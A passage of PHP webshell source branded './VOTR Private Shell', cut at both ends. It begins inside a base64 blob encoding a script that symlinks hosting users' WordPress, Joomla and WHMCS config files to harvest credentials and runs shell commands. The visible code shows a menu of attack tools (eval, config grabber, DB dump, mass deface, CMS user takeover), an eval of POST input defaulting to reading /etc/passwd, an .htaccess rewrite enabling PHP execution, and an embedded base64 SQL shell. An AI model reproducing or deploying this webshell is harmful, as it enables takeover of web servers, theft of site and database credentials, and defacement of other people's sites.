nLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7';
501?>
502<html>
503<head>
504<title>./VOTR SHELL</title>
505<script type="text/javascript">
506function tukar(lama,baru){
507 document.getElementById(lama).style.display = 'none';
508 document.getElementById(baru).style.display = 'block';
509}
510</script>
511<style type="text/css">
512body{
513 background:#000000;;
514}
515a {
516text-decoration:none;
517}
518a:hover{
519border-bottom:0px solid aqua;
520}
521*{
522 font-size:11px;
523 font-family:Lucida Grande,Lucida Sans Unicode,Lucida Sans;
524 color:#FF1493;
525}
526#menu{
527 background:#000000;
528 margin:8px 2px 4px 2px;
529}
530#menu a{
531 padding:2px 7px;
532 margin:0;
533 background:#BFC7C6;
534 text-decoration:none;
535 letter-spacing:2px;
536 -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
537
538}
539#menu a:hover{
540 background:black;
541 border-bottom:1px solid #FFFF00;
542 border-top:1px solid #FFFF00;
543}
544.tabnet{
545 margin:15px auto 0 auto;
546 border: 1px solid #FFFF00;
547}
548.main {
549 width:100%;
550}
551.gaya {
552 color: white;
553}
554.inputz{
555 background:#111111;
556 border:0;
557 padding:2px;
558 border-bottom:1px solid #222222;
559 border-top:1px solid #222222;
560}
561.inputzbut{
562 background:#111111;
563 color:white;
564 margin:0 4px;
565 border:1px solid #444444;
566
567}
568.inputz:hover
569 border-bottom:1px solid white;
570 border-top:1px solid white;
571
572}
573.inputzbut:hover{
574 border-bottom:1px solid white;
575 border-top:1px solid white;
576}
577.output {
578 margin:auto;
579 border:1px solid aqua;
580 width:100%;
581 height:400px;
582 background:#000000;
583 padding:0 2px;
584}
585.cmdbox{
586 width:100%;
587}
588.head_info{
589 padding: 0 4px;
590}
591.jaya{ font-family: ;}
592
593.kerupuk{
594 font-size:50px;
595 padding:0;
596 color:red;
597}
598.kerupuk_1{
599 text-align:center;
600 margin:0 4px 0 0;
601 padding:0 4px 0 0;
602 border-right:1px solid #333333;
603}
604.phpinfo table{
605 width:100%;
606 padding:0 0 0 0;
607}
608.phpinfo td{
609 background:#111111;
610 color:#cccccc;
611padding:6px 8px;;
612}
613.phpinfo th, th{
614 background:#191919;
615 border-bottom:1px solid #333333;
616font-weight:normal;
617}
618.phpinfo h2, .phpinfo h2 a{
619 text-align:center;
620 font-size:16px;
621 padding:0;
622 margin:30px 0 0 0;
623 background:aqua;
624 padding:4px 0;
625}
626.explore{
627width:100%;
628}
629.explore a {
630text-decoration:none;
631}
632.explore td{
633border-bottom:1px solid #333333;
634padding:0 8px;
635line-height:24px;
636}
637.explore th{
638padding:3px 8px;
639font-weight:normal;
640}
641.explore th:hover , .phpinfo th:hover{
642border-bottom:1px solid aqua;
643}
644.explore tr:hover{
645background:gray;
646}
647.viewfile{
648background:white;
649color:#000000;
650margin:4px 2px;
651padding:8px;
652}
653.sembunyi{
654display:none;
655padding:0;margin:0;
656}
657</style></head>
658<body onLoad="document.getElementById('cmd').focus();">
659<!-- head info start here -->
660<div class="main">
661<center>
662<hr color=black width=100%>
663<img src="http://i65.tinypic.com/2nsm1km.jpg" width="412" height="215"/><a/><br />
664<a href="javascript:void(0)" onclick="location.reload();"><h2><center>./VOTR Private Shell</center></h2></a>
665</center>
666<a href="javascript:void(0)" onclick="location.reload();"><h2><center>THIS IS WEBSHELL :V</center></h2></a>
667<hr color=black width=100%>
668</div>
669<center>
670<td><?php echo $buff; ?></td>
671<hr color=black width=100%>
672
673
674
675<!-- head info end here -->
676<!-- menu start -->
677<div id="menu">
678<a href="?<?php echo "y=".$pwd; ?>">Home</a>
679<a href="?<?php echo "y=".$pwd; ?>&x=shell">Shell</a>
680<a href="?<?php echo "y=".$pwd; ?>&x=php">Eval</a>
681<a href="?<?php echo "y=".$pwd; ?>&x=mysql">Mysql</a>
682<a href="?<?php echo "y=".$pwd; ?>&x=jumping">Jumping</a>
683<a href="?<?php echo "y=".$pwd; ?>&x=grabc">Config Grabber</a>
684<a href="?<?php echo "y=".$pwd; ?>&x=sec">Symlink Server</a>
685<a href="?<?php echo "y=".$pwd; ?>&x=sf">Symlink File</a>
686<a href="?<?php echo "y=".$pwd; ?>&x=dv">/var/named</a>
687<a href="?<?php echo "y=".$pwd; ?>&x=dump">DB Dump</a>
688<br><br>
689<a href="?<?php echo "y=".$pwd; ?>&x=upload">Upload</a>
690<a href="?<?php echo "y=".$pwd; ?>&x=ggwp">Wordpress Auto Edit User</a>
691<a href="?<?php echo "y=".$pwd; ?>&x=joom">Joomla Auto Edit User</a>
692<a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">PhpInfo</a>
693<a href="?<?php echo "y=".$pwd; ?>&x=mass">Mass Deface</a>
694<a href="?<?php echo "y=".$pwd; ?>&x=hash">Hash</a>
695<a href="?<?php echo "y=".$pwd; ?>&x=hashid">Hash ID</a>
696<a href="?<?php echo "y=".$pwd; ?>&x=cpanel">Cpanel Tools</a>
697<a href="?<?php echo "y=".$pwd; ?>&x=netsploit">NetSploit</a>
698<a href="?<?php echo "y=".$pwd; ?>&x=about">About</a>
699<a href="?<?php echo "y=".$pwd; ?>&x=logout">Logout</a>
700
701</div>
702<!-- menu end -->
703
704<?php
705@ini_set('display_errors', 0);
706if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
707<form action="?y=<?php echo $pwd; ?>&x=php" method="post">
708<table class="cmdbox">
709<tr><td>
710<textarea class="output" name="cmd" id="cmd">
711<?php
712if(isset($_POST['submitcmd'])) {
713 echo eval(magicboom($_POST['cmd']));
714}
715else echo "echo file_get_contents('/etc/passwd');";
716?>
717</textarea>
718<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
719</table>
720</form>
721
722<?php }
723
724elseif(isset($_GET['x']) && ($_GET['x'] == 'sql'))
725 {
726 ?>
727<form action="?y=<?php echo $pwd; ?>&x=sql" method="post">
728<?php
729echo "<center/><br/><b><font color=white>Mysql Interface by S4MP4H</font></b><br><br>";
730 mkdir('mysql', 0755);
731 chdir('mysql');
732 $akses = ".htaccess";
733 $buka_lah = "$akses";
734 $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!");
735 $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
736AddType application/x-httpd-php .cpc
737";
738 fwrite ( $buka , $metin ) ;
739 fclose ($buka);
740$sqlshell = 'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIsICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVja